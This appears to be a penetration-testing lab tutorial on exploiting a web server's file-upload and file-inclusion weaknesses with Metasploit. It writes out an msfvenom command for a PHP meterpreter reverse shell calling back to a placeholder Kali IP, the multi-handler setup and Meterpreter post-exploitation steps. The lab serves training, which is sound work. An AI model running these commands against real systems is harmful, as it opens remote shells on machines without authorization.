🚧 Web Application Penetration with Metasploit

Introduction

In this lab, we will learn how to exploit web application vulnerabilities using Metasploit. The objective is to gain a reverse shell on the target machine and achieve remote code execution. This lab will provide a hands-on experience in leveraging Metasploit's powerful tools and payloads to compromise a vulnerable web server.

Understand the Vulnerability

In this step, we will revisit the file inclusion vulnerability, which is a common web application vulnerability that allows an attacker to include arbitrary files on the server.

File inclusion vulnerabilities can be divided into two types:

1. Local File Inclusion (LFI): This vulnerability allows an attacker to include files from the local system.
2. Remote File Inclusion (RFI): This vulnerability allows an attacker to include remote files from other servers.

Both types of file inclusion vulnerabilities can be leveraged to execute malicious code on the server, leading to remote code execution.

Generate a Reverse Shell Payload

In this step, we will use Metasploit's msfvenom tool to generate a reverse shell payload. This payload will be executed on the target machine, establishing a reverse connection back to our Kali Linux system.

1. Open a terminal and navigate to the desired directory:

cd /home/labex/project

2. Use the msfvenom command to generate a PHP reverse shell payload:

msfvenom -p php/meterpreter/reverse_tcp LHOST=YOUR_KALI_IP LPORT=4444 -f raw > reverse_shell.php

Replace YOUR_KALI_IP with the IP address of your Kali Linux machine, and 4444 with the port number you want to use for the reverse connection.

The generated reverse_shell.php file will contain the PHP code for the reverse shell payload.

Upload the Payload

In this step, we will upload the generated reverse_shell.php payload to the vulnerable web server.

1. Open a web browser and navigate to the vulnerable web application.
2. Locate the file upload functionality and upload the reverse_shell.php payload.
3. Note the path or URL where the payload has been uploaded.

Set Up Metasploit Multi-Handler

In this step, we will set up the Metasploit multi-handler to receive the reverse connection from the target machine.

1. Open a terminal and start the Metasploit console:

msfconsole

2. Within the Metasploit console, set up the multi-handler:

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST YOUR_KALI_IP
set LPORT 4444
exploit -j

Replace YOUR_KALI_IP with the IP address of your Kali Linux machine, and 4444 with the port number you used when generating the payload.

The multi-handler is now listening for incoming connections.

Trigger the Payload

In this step, we will trigger the payload on the web server to establish a reverse connection to our Kali Linux machine.

1. Open a web browser and navigate to the URL or path where the reverse_shell.php payload was uploaded.
2. Observe the Metasploit console for an incoming connection.

If the payload execution is successful, you should see a Meterpreter session opened in the Metasploit console, indicating that you have gained a reverse shell on the target machine.

Explore Meterpreter (Optional)

In this step, we will explore the Meterpreter session, which provides a powerful post-exploitation environment for further actions on the compromised machine.

1. Within the Meterpreter session, use the help command to display available commands.
2. Try some common commands like sysinfo, getuid, pwd, ls, etc., to gather information about the target system.
3. You can also use the upload command to upload additional tools or payloads to the target machine.

Summary

In this lab, we learned how to leverage Metasploit to exploit web application vulnerabilities and gain a reverse shell on the target machine. We covered the following steps:

1. Understood the file inclusion vulnerability and its impact.
2. Generated a reverse shell payload using msfvenom.
3. Uploaded the payload to the vulnerable web server.
4. Set up a Metasploit multi-handler to receive the reverse connection.
5. Triggered the payload to establish a reverse connection and open a Meterpreter session.
6. (Optional) Explored the Meterpreter session for post-exploitation activities.

This hands-on experience with Metasploit will help you understand the power of this penetration testing tool and its capabilities in exploiting web application vulnerabilities. Remember, ethical hacking and penetration testing should only be performed with proper authorization and for legitimate purposes.